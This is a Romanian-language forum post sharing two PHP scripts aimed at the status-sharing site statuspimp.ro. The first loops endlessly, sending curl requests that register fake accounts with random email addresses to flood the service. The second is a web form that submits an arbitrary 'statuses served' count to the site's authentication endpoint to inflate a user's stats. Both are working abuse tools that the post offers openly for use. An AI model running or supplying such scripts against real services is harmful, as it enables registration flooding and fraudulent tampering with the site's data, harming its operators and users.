Jump to content
Piticutzz

2 pentru statuspimp.ro

Recommended Posts

Script inregistrare useri statuspimp.ro


<?php
function init() {
$m=”email=idyahoo”.rand().”@yahoo.com&password=”.md5(rand()).”&yahoo=test&gtalk=&skype”;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “http://www.spimp.me/register_v2.php”);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $m);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
$store = curl_exec ($ch);
return $store;
curl_close ($ch);
}
while(1) {
echo init();
}

?>

Mai multe detalii: Anti statuspimp.ro - jet in mm de site zdreantza Blog Archive Script inregistrare useri statuspimp.ro

si 2.Cresteti numarul de statusuri servite


<?php
error_reporting(0);
if($_POST['user']) {

$m="username=".$_POST['user']."&password=".md5($_POST['parola'])."&version=2.5&served=".$_POST['servit'];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.spimp.me/authenticate_v2.php");
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $m);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_exec ($ch);
curl_close ($ch);
echo "<h1>am trimis..ia reintra in panoul de control</h1><br><br><br>";
}
?>
Program adaugare statusuri servite pt statuspimp.ro<br><br>
<form method="POST" name="mataigrasa">
Introdu aici useru bah(adica emailu):<br>
<input type="text" name="user" id="user"><br>
Introdu aici parola bah:<br>
<input type="password" name="parola" id="parola"><br>
Cate statusuri servesti astazi?:<br>
<input type="text" name="servit" id="servit"><br><br>
<input type="submit" value="Adauga si mie acolo ca am servit">
</form>

<br><br>De <a href="http://statuspimp.bloggerz.ro/">http://statuspimp.bloggerz.ro/</a>

Mai multe: Anti statuspimp.ro - jet in mm de site zdreantza Blog Archive Numarul de statusuri servite cik

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...